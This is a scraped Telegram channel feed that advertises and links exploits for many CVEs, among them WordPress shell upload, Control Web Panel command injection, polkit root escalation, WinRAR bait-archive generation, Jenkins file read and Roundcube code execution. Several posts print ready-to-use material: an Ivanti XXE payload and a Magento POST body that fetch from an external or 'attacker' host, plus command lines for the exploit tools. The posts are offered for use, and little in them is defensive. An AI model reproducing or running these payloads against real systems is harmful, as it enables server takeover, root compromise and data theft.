BugCod3

WordPress_Yith_WooCommerce_Gift_Cards_Premium_3_19_0_Shell_Upload.txt

4.2 KB

🅰

📝

WordPress Yith WooCommerce Gift Cards Premium 3.19.0 Shell Upload Vulnerability

➖ Category: web applications

🖥 Platform: php

✉️ Description: Unauthenticated Arbitrary File Upload

➕ Affected Plugin: Yith WooCommerce Gift Cards Premium

➕ Affected Versions: <= 3.19.0

⭐ CVE ID: CVE-2022-45359

🪖 CVSS Score: 9.8 (Critical)

🏠 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N

🗂️

Size:

🅰

📝

#CVE #Web_Applications #Php

➗

👤

t.iss.one/MRvirusIRBOT

📢

t.iss.one/SashClient

🪩

Https://discord.gg/UfFvDYBBMM

🌐

Https://sash.mybin.ir

Please open Telegram to view this post

VIEW IN TELEGRAM

👍1

516 viewsedited 00:10

Https://discord.gg/UfFvDYBBMM

Control-Web-Panel.txt

3.8 KB

Control Web Panel Unauthenticated Remote Command Execution Exploit

➖

Category: remote exploits

🖥

Platform: linux

🪖

Risk: Security Risk Critical 🚨

🗂️

Size:

🅰

📝

Description: Control Web Panel versions prior to 0.9.8.1147 are vulnerable to unauthenticated OS command injection. Successful exploitation results in code execution as the root user. The results of the command are not contained within the HTTP response and the request will block while the command is running.

⭐

CVE: CVE-2022-44877

#CVE #Linux #Exploit

➗

👤

t.iss.one/MRvirusIRBOT

📢

t.iss.one/SashClient

🪩

🌐

Https://sash.mybin.ir

Please open Telegram to view this post

VIEW IN TELEGRAM

494 viewsedited 00:53

CVE-2021-4034

One day for the polkit privilege escalation exploit

Just execute make, ./cve-2021-4034 and enjoy your root shell.

GitHub

#CVE #POC
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3

334 viewsedited 15:57

SugarCRM 12.x Remote Code Execution / Shell Upload Exploit

Category: remote exploits

Platform: php

Risk: [Security Risk Critical]

Description:
This Metasploit module exploits CVE-2023-22952, a remote code execution vulnerability in SugarCRM 11.0 Enterprise, Professional, Sell, Serve, and Ultimate versions prior to 11.0.5 and SugarCRM 12.0 Enterprise, Sell, and Serve versions prior to 12.0.2.

CVE: 2023-22952

Download

#CVE #Exploit #Rc #Shell
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3

407 views17:29

This media is not supported in your browser

VIEW IN TELEGRAM

CVE-2020-0796 Remote overflow POC

CVE-2020–0796, is pre-remote code execution vulnerability that resides in the Server Message Block 3.0 (SMBv3) network communication protocol

Which devices does the CVE-2020-0796 affect?

+ Windows 10 Version 1903 for 32-bit Systems

+ Windows 10 Version 1903 for ARM64-based Systems

+ Windows 10 Version 1903 for x64-based Systems

+ Windows 10 Version 1909 for 32-bit Systems

+ Windows 10 Version 1909 for ARM64-based Systems

+ Windows 10 Version 1909 for x64-based Systems

+ Windows Server, version 1903 (Server Core installation)

+ Windows Server, version 1909 (Server Core installation)

GitHub
GitHub

#CVE #Microsoft #POC
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3

424 views07:41

🪳

CVE-2023-38831 winrar exploit generator

🪳

👥

Quick poc test:
Generate the default poc for test

python cve-2023-38831-exp-gen.py poc

python cve-2023-38831-exp-gen.py CLASSIFIED_DOCUMENTS.pdf script.bat  poc.rar

👤

Custom:
⚪️ Place the bait file and (evil) script file in the current directory, the bait file is recommended to be an image (.png, jpg) or a document (.pdf)
⚪️ Run

python cve-2023-38831-exp-gen.py <bait name> <script name> <output name>

to generate your exploit

👆

Analysis Blog

👁‍🗨

Reference

😸

Github

⬇️

🔒

BugCod3

#CVE #Winrar #Exploit

➖

👤

📣

Please open Telegram to view this post

VIEW IN TELEGRAM

❤4⚡1👍11

1.05K views00:03

CVE-2024-22024

XXE on Ivanti Connect Secure

☠️ payload encoded base64:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % xxe SYSTEM "https://{{external-host}}/x"> %xxe;]><r></r>

send it to:
127.0.0.1/dana-na/auth/saml-sso.cgi with SAMLRequest parm

#bugbountytips #cve #Ivanti

➖

👤

📣

Please open Telegram to view this post

VIEW IN TELEGRAM

⚡2❤2🔥1

851 views01:35

🦇

CVE-2024-23897 | Jenkins <= 2.441 & <= LTS 2.426.2 PoC and scanner

🦇

💬

Description:
Exploitation and scanning tool specifically designed for Jenkins versions <= 2.441 & <= LTS 2.426.2. It leverages CVE-2024-23897 to assess and exploit vulnerabilities in Jenkins instances.

💻

Usage:
Ensure you have the necessary permissions to scan and exploit the target systems. Use this tool responsibly and ethically.

python CVE-2024-23897.py -t <target> -p <port> -f <file>

python CVE-2024-23897.py -i <input_file> -f <file>

📊 Parameters:

⚪️

-t or --target: Specify the target IP(s). Supports single IP, IP range, comma-separated list, or CIDR block.

⚪️

-i or --input-file: Path to input file containing hosts in the format of https://1.2.3.4:8080/ (one per line).

⚪️

-o or --output-file: Export results to file (optional).

⚪️

-p or --port: Specify the port number. Default is 8080 (optional).

⚪️

-f or --file: Specify the file to read on the target system.

😸

Github

⬇️

🔒

BugCod3

#CVE #PoC #Scanner

➖

👤

📣

Please open Telegram to view this post

VIEW IN TELEGRAM

⚡4❤3🔥1

1.12K views18:40

CNEXT exploits

💬

Exploits for CNEXT (CVE-2024-2961), a buffer overflow in the glibc's iconv()

👁‍🗨 Technical analysis:
The vulnerability and exploits are described in the following blogposts:

⚪️

Iconv, set the charset to RCE: Exploiting the glibc to hack the PHP engine (part 1)
⚪️ To be continued...

🗝 Exploits:
Exploits will become available as blogposts come out.

⚪️

CNEXT: file read to RCE exploit
⚪️ To be continued...

😸

Github

⬇️

🔒

BugCod3

#CVE #Exploit #Cnext

➖

👤

📣

Please open Telegram to view this post

VIEW IN TELEGRAM

⚡2🔥2❤1

1.17K views05:38

CVE-2024-34102 POC

POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/2

{"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData":{"data":"https://attacker*com/xxe.xml","dataIsURL":true,"options":1337}}}}}}

#CVE #POC

➖

👤

📣

Please open Telegram to view this post

VIEW IN TELEGRAM

⚡2🔥2❤1

1.36K viewsedited 21:41

CVE-2024-55591

A Fortinet FortiOS Authentication Bypass Vulnerable Behaviour Detection

💬

Description:
This script attempts to create a WebSocket connection at a random URI from a pre-authenticated perspective to the FortiOS management interface, and reviews the response to determine if the instance is vulnerable

Affected Versions:
⚪️ FortiOS 7.0.0 through 7.0.16
⚪️ FortiProxy 7.0.0 through 7.0.19
⚪️ FortiProxy 7.2.0 through 7.2.12

😸

Github

⬇️

🔒

BugCod3

#Python #CVE #Vulnerable #Detection

➖

👤

📣

Please open Telegram to view this post

VIEW IN TELEGRAM

👍4❤3🔥3⚡2👎1

2.83K viewsedited 12:02

WordPress A/B Image Optimizer 3.3 Plugin Arbitrary File Download Vulnerability

📊

Category: web applications

💻

Platform: php

🪖

Risk: Security Risk High 🚨

💬

WordPress Plugin A/B Image Optimizer plugin versions 3.3 and below suffers from an arbitrary file download vulnerability.

🔥

CVE: CVE-2025-25163

⬇️

🔒

BugCod3

#CVE #Exploit #PHP #WordPress

➖

👤

📣

Please open Telegram to view this post

VIEW IN TELEGRAM

⚡5❤4👍3🔥3

3.63K views00:03

CVE-2025-49113 - Roundcube Remote Code Execution

A proof-of-concept exploit for CVE-2025-49113, a remote code execution vulnerability in Roundcube Webmail.

💬 Description:
This exploit targets a deserialization vulnerability in Roundcube Webmail versions 1.5.0 through 1.6.10. The vulnerability allows an authenticated attacker to execute arbitrary code on the server.

🏴‍☠️ Vulnerable Versions:
⚪️ 1.5.0 - 1.5.9
⚪️ 1.6.0 - 1.6.10

🖇 Requirements:
⚪️ PHP 7.0 or higher
⚪️ cURL extension enabled
⚪️ Target running a vulnerable version of Roundcube

💻 Usage:

php CVE-2025-49113.php <url> <username> <password> <command>

🔼 Example:

php CVE-2025-49113.php https://localhost/roundcube/ admin password "id"

Github

⬇️ Download
🔒 BugCod3

#CVE #PHP #RemoteCode
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3

⚡4❤3🔥3

2.7K views06:40